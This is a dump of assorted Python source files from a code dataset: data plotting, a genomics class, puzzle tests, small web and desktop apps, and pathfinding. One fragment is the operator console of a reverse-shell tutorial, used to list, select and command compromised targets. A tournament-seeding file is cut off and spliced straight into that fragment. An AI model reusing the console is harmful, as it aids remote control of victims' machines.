sns.despine()\r\n\r\n    figure.suptitle(title, fontweight=\"bold\", fontsize=20)\r\n    figure.text(s=\"Sex, Parch, Embarked, Pclass, SibSp\", \r\n                x=0.5, y=0.94, ha=\"center\", va=\"top\")\r\n\r\n    plt.show();\r\n\r\ndef display_continuous_distributions(with_survivability=False):\r\n    if with_survivability is True:\r\n        figure = plt.figure(figsize=(18, 15))\r\n        grids = figure.add_gridspec(3, 3)\r\n        palette = \"gist_gray_r\"\r\n\r\n        ax0 = figure.add_subplot(grids[0, 0])\r\n        ax1 = figure.add_subplot(grids[0, 1])\r\n\r\n        ax_age = ax0\r\n        sns.kdeplot(x=\"Age\", hue=\"Survived\", data=df_utility, fill=True, alpha=0.5, \r\n                    shade=True, ax=ax_age, palette=palette)\r\n        sns.despine()\r\n\r\n        ax_fare = ax1\r\n        sns.kdeplot(x=\"Fare\", hue=\"Survived\", data=df_utility, fill=True, alpha=0.5, \r\n                    shade=True, ax=ax_fare, palette=palette)\r\n        sns.despine()\r\n\r\n        figure.suptitle(\"Continuous Features with Survivability\", fontweight=\"bold\", fontsize=20)\r\n        figure.text(s=\"Age, Fare\", x=0.5, y=0.94, ha=\"center\", va=\"top\", fontsize=15)\r\n    else:\r\n        figure = plt.figure(figsize=(15, 8))\r\n        grids = figure.add_gridspec(2, 3)\r\n        palette = \"gist_gray\"; palette_r = \"gist_gray_r\"\r\n\r\n        ax0 = figure.add_subplot(grids[0, 0])\r\n        ax1 = figure.add_subplot(grids[0, 1])\r\n        ax2 = figure.add_subplot(grids[1, 0])\r\n        ax3 = figure.add_subplot(grids[1, 1])\r\n\r\n        ax_age = ax0\r\n        sns.kdeplot(x=\"Age\", color=\"gray\", shade=True, alpha=0.5, data=df_utility, ax=ax_age, palette=palette)\r\n        sns.despine()\r\n\r\n        ax_age2 = ax2\r\n        sns.boxenplot(x=\"Age\", hue=\"Survived\", data=df_utility, ax=ax_age2, palette=palette_r)\r\n        sns.despine()\r\n\r\n        ax_fare = ax1\r\n        sns.kdeplot(x=\"Fare\", color=\"gray\", shade=True, alpha=0.5, data=df_utility, ax=ax_fare, palette=palette)\r\n        sns.despine()\r\n\r\n        ax_fare2 = ax3\r\n        sns.boxenplot(x=\"Fare\", hue=\"Survived\", data=df_utility, ax=ax_fare2, palette=palette_r)\r\n        sns.despine()\r\n\r\n        title_spaced = \"      Age                                      Fare\"\r\n        figure.text(0.1, 1, title_spaced, fontsize=20, fontweight=\"bold\", fontfamily=\"serif\", ha=\"left\") \r\n\r\n    plt.show();\r\n\r\n","sub_path":".ipynb_checkpoints/structures-checkpoint.py","file_name":"structures-checkpoint.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"443568459","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Sequence, Union\n\nfrom .allele import Allele\nfrom .mhc_class_helpers import (\n    is_valid_restriction,\n    restrict_alleles,\n)\nfrom .class2_locus import Class2Locus\nfrom .pair import Pair\nfrom .result_with_multiple_alleles import ResultWithMultipleAlleles\nfrom .species import Species\n\nclass Haplotype(ResultWithMultipleAlleles):\n    def __init__(\n            self,\n            species: Species,\n            name: str,\n            alleles: Sequence[Allele],\n            class_restriction: Union[str, None] = None,\n            locus_restriction: Union[Class2Locus, None] = None,\n            parent_haplotypes: Union[Sequence[\"Haplotype\"], None] = None,\n            raw_string: Union[str, 
None] = None):\n ResultWithMultipleAlleles.__init__(\n self,\n species=species,\n name=name,\n alleles=alleles,\n raw_string=raw_string)\n self.class_restriction = class_restriction\n self.locus_restriction = locus_restriction\n self.parent_haplotypes = parent_haplotypes\n\n @classmethod\n def str_field_names(cls):\n return (\n \"species\",\n \"name\",\n \"num_alleles\",\n \"class_restriction\",\n \"locus_restriction\"\n )\n\n @classmethod\n def repr_field_names(cls):\n return (\n \"species\",\n \"name\",\n \"alleles\",\n \"class_restriction\",\n \"locus_restriction\"\n )\n\n @classmethod\n def eq_field_names(cls):\n return (\n \"species\",\n \"name\",\n \"class_restriction\",\n \"locus_restriction\"\n )\n\n @property\n def haplotype_name(self):\n return self.name\n\n def restrict_mhc_class(self, class_restriction, raise_on_error=True):\n if class_restriction is None:\n return self\n if self.class_restriction == class_restriction:\n return self\n if not is_valid_restriction(self.class_restriction, class_restriction):\n if raise_on_error:\n raise ValueError(\n \"Cannot restrict '%s' to class '%s'\" % (\n self.to_string(),\n class_restriction))\n else:\n return None\n restricted_alleles = restrict_alleles(self.alleles, class_restriction)\n return Haplotype(\n species=self.species,\n name=self.name,\n alleles=restricted_alleles,\n class_restriction=class_restriction,\n locus_restriction=self.locus_restriction,\n raw_string=self.raw_string)\n\n def restrict_class2_locus(self, class2_locus : Class2Locus, raise_on_error=True):\n if class2_locus is None:\n return self\n if self.locus_restriction == class2_locus:\n return self\n if self.locus_restriction is not None:\n if raise_on_error:\n raise ValueError(\n \"Haplotype %s already has locus restriction, cannot restrict to %s\" % (\n self, class2_locus))\n else:\n return None\n valid_genes = set(class2_locus.genes)\n\n restricted_alleles = [\n allele\n for allele in self.alleles\n if allele.gene in valid_genes\n ]\n return Haplotype(\n species=self.species,\n name=self.name,\n alleles=restricted_alleles,\n class_restriction=self.class_restriction,\n locus_restriction=class2_locus,\n raw_string=self.raw_string)\n\n def collapse_if_possible(self):\n \"\"\"\n If this haplotype contains a single allele or a single pair of\n class alleles for the same locus, return it. 
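The collapsed value is\n        either a bare Allele or a class II alpha/beta Pair. 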
Otherwise return None.\n \"\"\"\n allele = self.get_single_allele()\n if allele:\n return allele\n\n class2_pair = self.get_class2_pair()\n if class2_pair:\n return class2_pair\n return None\n\n def get_single_allele(self):\n if len(self.alleles) == 1:\n return self.alleles[0]\n return None\n\n def get_class2_pair(self):\n if self.locus_restriction is None:\n return None\n alpha_genes = self.locus_restriction.alpha_chain_genes\n beta_genes = self.locus_restriction.beta_chain_genes\n\n if len(alpha_genes) == 0 or len(beta_genes) == 0:\n return None\n alpha_alleles = [\n a for a in self.alleles\n if a.gene in alpha_genes\n ]\n beta_alleles = [\n a for a in self.alleles\n if a.gene in beta_genes\n ]\n if len(alpha_alleles) != 1 or len(beta_alleles) != 1:\n return None\n\n alpha = alpha_alleles[0]\n beta = beta_alleles[0]\n return Pair(alpha, beta)\n\n def to_string(\n self,\n include_species=True,\n use_old_species_prefix=False):\n if self.locus_restriction:\n result = self.locus_restriction.to_string(\n include_species=include_species,\n use_old_species_prefix=use_old_species_prefix)\n else:\n result = self.species.to_string(\n include_species=include_species,\n use_old_species_prefix=use_old_species_prefix)\n\n result += (\"-%s\" % (self.name,))\n\n if self.class_restriction:\n result += \" class %s\" % (self.class_restriction,)\n\n return result\n\n def compact_string(self, include_species=False):\n return self.to_string(include_species=include_species)\n","sub_path":"mhcgnomes/haplotype.py","file_name":"haplotype.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177709409","text":"import itertools\nfrom typing import List\n\n\ndef get_input() -> List[int]:\n with open(\"inputs/day9input.txt\", \"r\") as file:\n return [int(line.strip()) for line in file.readlines()]\n\n\ndef test_day9_part1():\n lines = get_input()\n\n def is_not_valid(index: int) -> bool:\n current = lines[index]\n return not any((i for i in range(index - 25, index) if current - lines[i] in itertools.islice(lines, i, index)))\n\n bad_index = next(index for index in range(25, len(lines)) if is_not_valid(index))\n\n print(f\"found invalid on line {bad_index}: {lines[bad_index]}\")\n\n assert bad_index == 564\n assert lines[bad_index] == 105950735\n\n\ndef test_day9_part2():\n lines = get_input()\n target = 105950735\n start_index = 0\n end_index = 0\n while start_index < len(lines) - 1:\n acc = lines[start_index]\n end_index = start_index + 1\n while end_index < len(lines) and acc < target:\n acc += lines[end_index]\n end_index += 1\n if acc == target:\n break\n start_index += 1\n window = lines[start_index:end_index]\n end_sum = min(window) + max(window)\n print(window)\n assert sum(window) == target\n assert start_index == 448\n assert end_index == 465\n assert end_sum == 13826915\n","sub_path":"solutions/test_day9.py","file_name":"test_day9.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"7287177","text":"from flask import Flask, render_template, request, flash, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'endxskuifxndiinmenxmeibdgedidg'\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\r\ndb = SQLAlchemy(app)\r\n\r\nclass Chat(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n content = db.Column(db.String(1000))\r\n 
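# free-form display name of the message author (this app defines no user table to reference)\r\n    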
sender = db.Column(db.String(50))\r\n    room = db.Column(db.Integer, db.ForeignKey('room.id'))\r\n\r\n    def __repr__(self):\r\n        return \"<Chat %r>\" % self.id\r\n\r\nclass Room(db.Model):\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    roomname = db.Column(db.String(50), unique=True)\r\n    password = db.Column(db.String(20))\r\n    messages = db.relationship('Chat')\r\n\r\n    def __repr__(self):\r\n        return \"<Room %r>\" % self.id\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n    if request.method == 'POST':\r\n        data = request.form['Room']\r\n\r\n        if data:\r\n            flash(\"Room Found!\")\r\n        else:\r\n            return redirect(url_for('add'))\r\n    \r\n    return render_template('index.html')\r\n\r\n@app.route('/rooms/add', methods=['GET', 'POST'])\r\ndef add():\r\n    if request.method == 'POST':\r\n        data = request.form['Room']\r\n    \r\n    return render_template('add.html')","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"225931132","text":"#-*- coding:utf-8 -*-\r\n\r\nimport numpy as np\r\nimport random\r\n\r\ndef Nseed_group(Nseed, ranker_team, team_participant):\r\n    #Input\r\n    #Nseed: Number of seeds\r\n    #ranker_team (vector): ranker_team[i] means the team number of the (i+1)th ranker\r\n    #team_participant: Number of participants of each team (NumPy vector)\r\n    team_ranker=cal_team_ranker(team_participant.shape[0], ranker_team)\r\n    \r\n    
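#e.g. with ranker_team=np.array([2,1,3,1]) (illustrative values only), team 2 holds seed 1,\r\n    #team 1 holds seeds 2 and 4, and team 3 holds seed 3, so team_ranker begins [2, 1, 1, ...]\r\n    \r\n    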
#Output\r\n    #group list\r\n    \r\n    #get group list including only rankers\r\n    group_list=groups_only_ranker(ranker_team)\r\n    \r\n    #add empty groups (unseed blocks) into group list\r\n    group_list=add_empty_groups(group_list, np.max(team_participant))\r\n    \r\n    #unranker distribution\r\n    team_unranker=team_participant-team_ranker ##Number of unrankers of each team\r\n    group_list=dist_unranker(group_list, team_unranker, team_participant)\r\n    \r\n    return group_list\r\n    \r\ndef cal_team_ranker(n_group, ranker_team):\r\n    team_ranker=np.zeros(n_group)\r\n    \r\n    for i in range(n_group):\r\n        team_ranker[i]=np.sum(ranker_team==(i+1))\r\n    \r\n    return team_ranker\r\n\r\ndef NumOfDigits_2(x):\r\n    #Input\r\n    #x: number\r\n    \r\n    #Output\r\n    #k: the integer as \"2^(k-1) < x <= 2^k\"\r\n    \r\n    k=1\r\n    while pow(2, k)<x:\r\n        k=k+1\r\n    return k\r\n\r\ndef add_empty_groups(group_list, max_team_participant):\r\n    #Input\r\n    #group_list: group list including only rankers\r\n    #max_team_participant: maximum number of participants over all teams\r\n    #(so that the number of empty groups >= 2^k between two seed blocks)\r\n    \r\n    #Output\r\n    #group list extended with empty groups (unseed blocks)\r\n    k1=pow(2, NumOfDigits_2(max_team_participant))\r\n    k2=len(group_list)\r\n    \r\n    while k2<k1:\r\n        #interleave one empty group after every existing group\r\n        i=0\r\n        while i<k2:\r\n            group_list.insert(2*i+1, [])\r\n            i=i+1\r\n        k2=len(group_list)\r\n    return group_list\r\n\nwhile True:\n    cmd = input('> ')\n\n    ''' Changing the look of the command prompt - this cmd now is a custom\n        command. Not handled by our OS ... handled by whatever we tell it.\n    '''\n    if cmd == 'list':\n        list_connections()\n        \n        ''' If the user types 'list' the loop continues listing available\n            connections until user types something other than 'list'. (We\n            still have to build this function 'list_connections')\n        '''\n\n    elif 'select' in cmd:\n        \n        ''' this is saying that if the word 'select' is in the command at\n            all to run this elif. Because we will type 'select 2' or \n            'select 3' etc. to choose which connection we want to send\n            commands to.\n        '''\n        conn = get_target(cmd)\n        \n        ''' We have to build this function to actually get this connection\n            object. Pass it in this command and extract the ID number and\n            get the connection from that.\n        '''\n        \n        if conn is not None:\n            \n            ''' We want to make sure our target connection is active and \n                not None. In case our connection has been lost, or it is\n                an old connection, etc.\n            '''\n            send_target_commands(conn)\n            \n            ''' We need to build this function so we can control our \n                target remotely.\n            '''\n            \n    else:\n        print('Command not recognized')\n        \n        ''' In case of a Typo or something. 
'''\n            \n","sub_path":"NB_Reverse_Shell/vid_09.py","file_name":"vid_09.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"108885167","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n\ndef show_distribution(df, col_names=[], layout=()):\n    if len(col_names) == 0:\n        raise Exception(\"please supply col_names!\")\n    else:\n        for col in col_names:\n            df[col].plot(kind='hist', figsize=(20, 12))\n        plt.show()\n\n\ndef show_density(df, col_names=[], layout=()):\n    if len(col_names) != 0:\n        data = df[col_names]\n    else:\n        numeric_cols = df.columns.values\n        data = df[numeric_cols]\n    data.plot(kind='density', subplots=True, layout=layout, sharex=False)\n    plt.show()\n\n\ndef show_box(df, col_names=[], layout=()):\n    if len(col_names) != 0:\n        data = df[col_names]\n    else:\n        numeric_cols = df.columns.values\n        data = df[numeric_cols]\n    data.plot(kind='box', subplots=True, layout=layout, sharex=False)\n    plt.show()\n\n\ndef show_corrMat(df, col_names=[]):\n    if len(col_names) != 0:\n        data = df[col_names]\n    else:\n        numeric_cols = df.columns.values\n        data = df[numeric_cols]\n    corr = data.corr()\n    sns.set(font_scale=1)\n    sns.heatmap(corr, vmax=.8, square=True, annot=True, fmt='.2f', annot_kws={'size': 7})\n    plt.xticks(rotation=90)\n    plt.yticks(rotation=0)\n    plt.show()\n\n\ndef show_pairplot(df, col_names=[], label_names=None):\n    if len(col_names) != 0:\n        data = df[col_names]\n        sns.pairplot(data, size=2)\n        plt.show()\n\n\ndef show_relationshipWithLabel(df, col_names=[], label_names=None, col_types='numeric'):\n    if col_types == 'numeric':\n        for col in col_names:\n            fig, ax = plt.subplots()\n            ax.scatter(df[col], df[label_names])\n            plt.xlabel(col)\n            plt.ylabel(label_names)\n    elif col_types == 'categories':\n        for col in col_names:\n            data = pd.concat([df[label_names], df[col]], axis=1)\n            f, ax = plt.subplots()\n            fig = sns.boxplot(x=col, y=label_names, data=data)\n    plt.show()\n","sub_path":"module/visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"317850968","text":"# chat/consumers.py\nimport json\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nfrom django.contrib.auth.models import User\nfrom channels.layers import get_channel_layer\n\n\nclass ChatConsumer(WebsocketConsumer):\n    def connect(self):\n        print(\"CONNECTED\")\n        self.room_name = self.scope['url_route']['kwargs']['room_name']\n        self.room_group_name = 'chat_%s' % self.room_name\n        self.increment_online_count()\n\n        # Join room group\n        async_to_sync(self.channel_layer.group_add)(\n            self.room_group_name,\n            self.channel_name\n        )\n\n        self.accept()\n        async_to_sync(self.channel_layer.group_send)(\n            self.room_group_name,\n            {\n                'type': 'update_users_online',\n            }\n        )\n\n    def disconnect(self, close_code):\n        self.decrement_online_count()\n        # Leave room group\n        async_to_sync(self.channel_layer.group_send)(\n            self.room_group_name,\n            {\n                'type': 'update_users_online',\n            }\n        )\n        async_to_sync(self.channel_layer.group_discard)(\n            self.room_group_name,\n            self.channel_name\n        )\n\n    # Receive message from room group\n    def update_users_online(self, event):\n        # Send message to WebSocket\n        self.send(text_data=json.dumps({\n            'online_users': self.get_all_online_users_except_self()\n        }))\n\n    def increment_online_count(self):\n        user = self.scope['user']\n        
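# one count per open socket, so a user with several tabs stays \"online\"\n        # until the last tab disconnects\n        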
user.profile.online_count = user.profile.online_count + 1\n        user.profile.save()\n\n    def decrement_online_count(self):\n        user = self.scope['user']\n        if user.profile.online_count > 0:\n            user.profile.online_count = user.profile.online_count - 1\n            user.profile.save()\n\n    def get_all_online_users_except_self(self):\n        user = self.scope['user']\n        online_users = User.objects.filter(profile__online_count__gt=0).exclude(id=user.id)\n        for online_user in online_users:\n            print(str(online_user))\n        serialized_online_users = [online_user.profile.as_dict() for online_user in online_users]\n        return serialized_online_users\n\n\nclass GameInviteConsumer(WebsocketConsumer):\n    def connect(self):\n        self.room_name = self.scope['url_route']['kwargs']['user_id']\n        self.room_group_name = 'invite_%s' % self.room_name\n\n        # Join room group\n        async_to_sync(self.channel_layer.group_add)(\n            self.room_group_name,\n            self.channel_name\n        )\n        self.accept()\n\n    def disconnect(self, close_code):\n        # Leave room group\n        async_to_sync(self.channel_layer.group_discard)(\n            self.room_group_name,\n            self.channel_name\n        )\n\n    # Receive message from WebSocket\n    def receive(self, text_data):\n        text_data_json = json.loads(text_data)\n        user = text_data_json['user']\n        if user and user['id'] and isinstance(user['id'], int):\n\n            # Send message to room group\n            channel_layer = get_channel_layer()\n            async_to_sync(channel_layer.group_send)(\n                'invite_' + str(user['id']),\n                {\n                    'type': 'receive_invite',\n                    'message': 'Invite to checkers from ' + self.scope['user'].username\n                }\n            )\n\n    def receive_invite(self, event):\n        self.send(text_data=json.dumps({\n            'message': event['message']\n        }))\n","sub_path":"games/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"28385942","text":"from dataclasses import dataclass\nfrom datetime import datetime, timezone\nimport json\nfrom pathlib import Path\nimport pkgutil\nimport re\nfrom typing import Any, Mapping\n\nimport requests\nimport typer\n\napp = typer.Typer()\n\nweather_path = Path.home() / \".cache\" / \"weather.json\"\n\n\n@dataclass\nclass Location:\n    station_id: str\n    forecast_office_id: str\n    forecast_gridpoint_x: int\n    forecast_gridpoint_y: int\n\n\nmadison = Location(\n    station_id=\"KMSN\",\n    forecast_office_id=\"MKX\",\n    forecast_gridpoint_x=37,\n    forecast_gridpoint_y=63,\n)\n\n\n@dataclass\nclass Forecast:\n    high: int\n    low: int\n    cond: str\n    code: int\n    day: str\n\n\n@app.command()\ndef get_weather_feature(\n    days_out: int = typer.Option(..., \"--days-out\", \"-d\"),\n    feature: str = typer.Option(..., \"--feature\", \"-f\"),\n) -> None:\n    \"\"\"Given a number of days_out and a feature, print a single value\n    from either the current weather conditions or the forecast.\n\n    Args:\n        days_out (int):\n            A number in the range [0, 2] (three forecast days are cached)\n        feature (str):\n            One of \"Day\", \"Temp\", \"High\", \"Low\",\n            \"Cond\", \"Code\", \"Pres\", \"Humi\", \"Wind\"\n\n    Returns:\n        None: the value of the requested feature (w/o units) is printed to stdout\n    \"\"\"\n    weather_data = json.loads(weather_path.read_text())\n    if feature in [\"Day\", \"High\", \"Low\", \"Code\"]:\n        forecast = weather_data[\"forecasts\"][days_out]\n        print(forecast[feature])\n    elif days_out == 0:\n        if feature == \"Temp\":\n            print(weather_data[\"current_temperature\"])\n        elif feature == \"Pres\":\n            print(weather_data[\"current_pressure\"])\n        elif feature == \"Humi\":\n            print(weather_data[\"current_humidity\"])\n        elif feature == 
\"Wind\":\n print(weather_data[\"current_windspeed\"])\n elif feature == \"Cond\":\n print(weather_data[\"current_condition\"])\n else:\n raise ValueError(f\"Unknown feature ({feature}) for days_out == {days_out}\")\n else:\n raise ValueError(f\"Unknown feature ({feature}) for days_out == {days_out}\")\n\n\n@app.command()\ndef fetch_weather_data(\n station_id: str | None = None,\n forecast_office_id: str | None = None,\n forecast_gridpoint_x: int | None = None,\n forecast_gridpoint_y: int | None = None,\n):\n kwargs = [\n station_id,\n forecast_office_id,\n forecast_gridpoint_x,\n forecast_gridpoint_y,\n ]\n if any(kwarg is None for kwarg in kwargs):\n if any(kwarg is not None for kwarg in kwargs):\n raise ValueError(\"Incomplete argument specification\")\n else:\n location = madison\n else:\n location = Location(\n station_id=station_id,\n forecast_office_id=forecast_office_id,\n forecast_gridpoint_x=forecast_gridpoint_x,\n forecast_gridpoint_y=forecast_gridpoint_y,\n )\n\n current_weather = requests.get(\n f\"https://api.weather.gov/stations/{location.station_id}/observations/latest\"\n ).json()\n forecast = requests.get(\n f\"https://api.weather.gov/gridpoints/{location.forecast_office_id}/{location.forecast_gridpoint_x},{location.forecast_gridpoint_y}/forecast\"\n ).json()\n\n cwp = current_weather[\"properties\"]\n current_temperature = round(cwp[\"temperature\"][\"value\"] * 9 / 5 + 32)\n current_pressure = round(\n cwp[\"barometricPressure\"][\"value\"] * 0.00029529980164712, 2\n )\n current_humidity = round(cwp[\"relativeHumidity\"][\"value\"])\n current_windspeed = round(cwp[\"windSpeed\"][\"value\"] * 0.621371, 2)\n current_condition = cwp[\"textDescription\"]\n forecast_periods = forecast[\"properties\"][\"periods\"]\n tonight_period_number = max(\n [period[\"number\"] for period in forecast_periods if period[\"name\"] == \"Tonight\"]\n )\n\n forecast_days = []\n for day_num in range(3):\n period_1, period_2 = forecast_periods[\n tonight_period_number\n + day_num * 2 : tonight_period_number\n + (day_num + 1) * 2\n ]\n forecast_days.append(extract_forecast_from_period_pair(period_1, period_2))\n\n results = {\n \"current_temperature\": current_temperature,\n \"current_pressure\": current_pressure,\n \"current_humidity\": current_humidity,\n \"current_windspeed\": current_windspeed,\n \"current_condition\": current_condition,\n \"forecasts\": forecast_days,\n \"metadata\": {\n \"fetch_timestamp\": datetime.now(tz=timezone.utc).isoformat(\n timespec=\"seconds\"\n ),\n \"current_weather_generated_at\": cwp[\"timestamp\"],\n \"forecast_generated_at\": forecast[\"properties\"][\"generatedAt\"],\n },\n }\n weather_path.write_text(json.dumps(results, indent=2))\n\n\ndef extract_forecast_from_period_pair(\n period_1: Mapping[str, Any], # the odd period, with the High\n period_2: Mapping[str, Any], # the even period, with the Low\n) -> dict[str, Any]:\n high = period_1[\"temperature\"]\n low = period_2[\"temperature\"]\n cond = period_1[\"shortForecast\"]\n day = period_1[\"name\"][:3]\n icon_url = period_1[\"icon\"]\n r = re.match(\n r\"https:\\/\\/api\\.weather\\.gov\\/icons\\/land\\/(day|night)\\/(\\w*).*\", icon_url\n )\n nws_code = r.group(2)\n nws_to_yahoo_map = json.loads(\n pkgutil.get_data(\"nws_weather\", \"nws_to_yahoo_code_map.json\").decode(\"utf8\")\n )\n yahoo_code = nws_to_yahoo_map[nws_code]\n return {\n \"High\": high,\n \"Low\": low,\n \"Cond\": cond,\n \"Code\": yahoo_code,\n \"Day\": day,\n }\n\n\nif __name__ == \"__main__\":\n 
app()\n","sub_path":"nws_weather/nws_weather.py","file_name":"nws_weather.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"326354040","text":"from hottbox.core import Tensor, TensorTKD\nfrom hottbox.utils.generation import residual_tensor\n\n\ndef compression_rate(tensor, tensor_rep):\n \"\"\"\n\n Parameters\n ----------\n tensor : Tensor\n tensor_rep : TensorTKD\n\n Returns\n -------\n float\n \"\"\"\n s1 = tensor.size\n s2 = tensor_rep.core.size\n for fmat in tensor_rep.fmat:\n s2 += fmat.size\n return s1 / s2\n\n\ndef print_basic_metrics(tensor, tensor_rep):\n \"\"\"\n\n Parameters\n ----------\n tensor : Tensor\n tensor_rep : TensorTKD\n \"\"\"\n\n rel_error = (residual_tensor(tensor, tensor_rep).frob_norm / tensor.frob_norm) * 100\n comp_rate = compression_rate(tensor, tensor_rep)\n print(\"{}\\n\".format(tensor_rep))\n print(\"Basic metrics:\")\n print(\"--------------\")\n print(\"Compression rate = {:.2f}\\n\".format(comp_rate))\n print(\"Relative error of approximation = {:.2f}%\\n\".format(rel_error))\n","sub_path":"inns/inns/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"494148640","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtWidgets, QtCore\nfrom mainwin import Ui_MainWindow\nimport sys\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.path = QtCore.QDir.rootPath()\n self.model = QtWidgets.QFileSystemModel()\n self.model.setRootPath(self.path)\n self.model.setFilter(QtCore.QDir.Dirs | QtCore.QDir.Files | QtCore.QDir.NoDot)\n self.model.setNameFilterDisables(False)\n\n self.ui.treeView.setSortingEnabled(False)\n self.ui.treeView.setModel(self.model)\n self.ui.treeView.hideColumn(1)\n self.ui.treeView.hideColumn(2)\n self.ui.treeView.hideColumn(3)\n self.ui.treeView.setRootIndex( self.model.index(self.path) )\n\n self.ui.treeView.clicked.connect(self.updateModel)\n self.ui.exportBtn.clicked.connect(self.exportBtnClick)\n self.ui.filterEdit.textChanged.connect(self.onTextChanged)\n\n def updateModel(self, index):\n self.path = self.model.fileInfo(index).filePath()\n if index.data() != '..':\n self.ui.treeView.setRootIndex(index)\n else:\n currentRoot = self.ui.treeView.rootIndex()\n self.ui.treeView.setRootIndex(currentRoot.parent())\n\n def exportBtnClick(self):\n index = self.model.index(self.path)\n rowCount = self.model.rowCount(index)\n file_data = ''\n for i in range(rowCount):\n mi = self.model.index(i, 0, index)\n fileInfo = self.model.fileInfo(mi)\n file_data = ','.join(['%s%s,%s\\n' % (file_data, fileInfo.fileName(), fileInfo.absoluteFilePath())])\n fname = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File', filter='*.csv')\n if fname:\n file = open(fname[0], 'w')\n file.write(file_data)\n file.close()\n\n @QtCore.pyqtSlot(str)\n def onTextChanged(self, txt):\n self.model.nameFilters().clear()\n self.model.setNameFilters(['%s*' % txt])\n if txt == \"\":\n self.model.nameFilters().clear()\n self.model.setNameFilters(['*'])\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication([])\n application = MainWindow()\n application.show()\n\n 
sys.exit(app.exec())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"46463850","text":"# from https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2\nimport math\n\nclass Node():\n \"\"\"A node class for A* Pathfinding\"\"\"\n\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n\n self.cost = 0\n self.heuristic = 0\n self.total_cost = 0\n\n def __eq__(self, other):\n # print(\"checking node equality\", self.position, other.position)\n return self.position[0] == other.position[0] and self.position[1] == other.position[1] \n\ndef get_distance(x1, y1, x2, y2, technique):\n if technique == \"diagonal\":\n return (x1 - x2)**2 + (y1 - y2)**2 # ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)\n \n if technique == \"manhattan\":\n return abs(x1 - x2) + abs(y1 - y2)\n\n\ndef astar(maze, start, end):\n # create start and end node\n start_node = Node(None, start)\n end_node = Node(None, end)\n\n expandedNodes = 0\n\n # initialize lists\n open_list = []\n closed_list = []\n\n # put the start node in the open list\n open_list.append(start_node)\n\n # define looping condition\n # ie. if there are nodes left to open\n # then continue to loop\n has_open_node = len(open_list) > 0\n\n while has_open_node:\n curr_index = 0\n curr_node = open_list[curr_index]\n\n # find the node with the least total_cost\n for index, node in enumerate(open_list):\n if node.total_cost < curr_node.total_cost:\n curr_node = node\n curr_index = index\n\n # pop most recent current node from open list\n # enqueue to closed_list\n open_list.pop(curr_index)\n\n\n closed_list.append(curr_node)\n\n # Found the goal\n if curr_node == end_node:\n path = []\n curr = curr_node\n while curr is not None:\n path.append(curr.position)\n curr = curr.parent\n path.reverse()\n return path, expandedNodes\n\n # initialize children list\n children = []\n\n # set the relative positions of all possible adjacent cells\n # technique is given by Swift, Nicolas\n # from https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2\n\n adj_cells = [(-1, -1), (-1, 0), (-1, 1),\n ( 0, -1), (0, 1), \n (1, -1), ( 1, 0), (1, 1)]\n \n for new_position in adj_cells: # adj squares\n\n # Get node position\n curr_x = curr_node.position[0]\n curr_y = curr_node.position[1]\n\n new_x = new_position[0]\n new_y = new_position[1]\n\n node_position = (curr_x + new_x, curr_y + new_y)\n\n # make sure there is no obstacle in this node\n is_walkable = maze[node_position[0]][node_position[1]] == 0\n if not is_walkable:\n continue\n\n # make sure is in range\n is_within_range = node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0\n if is_within_range:\n continue\n\n # make new node for this adj cell\n new_node = Node(curr_node, node_position)\n\n # add this adj cell to the list of children of the current node\n children.append(new_node)\n\n # Check 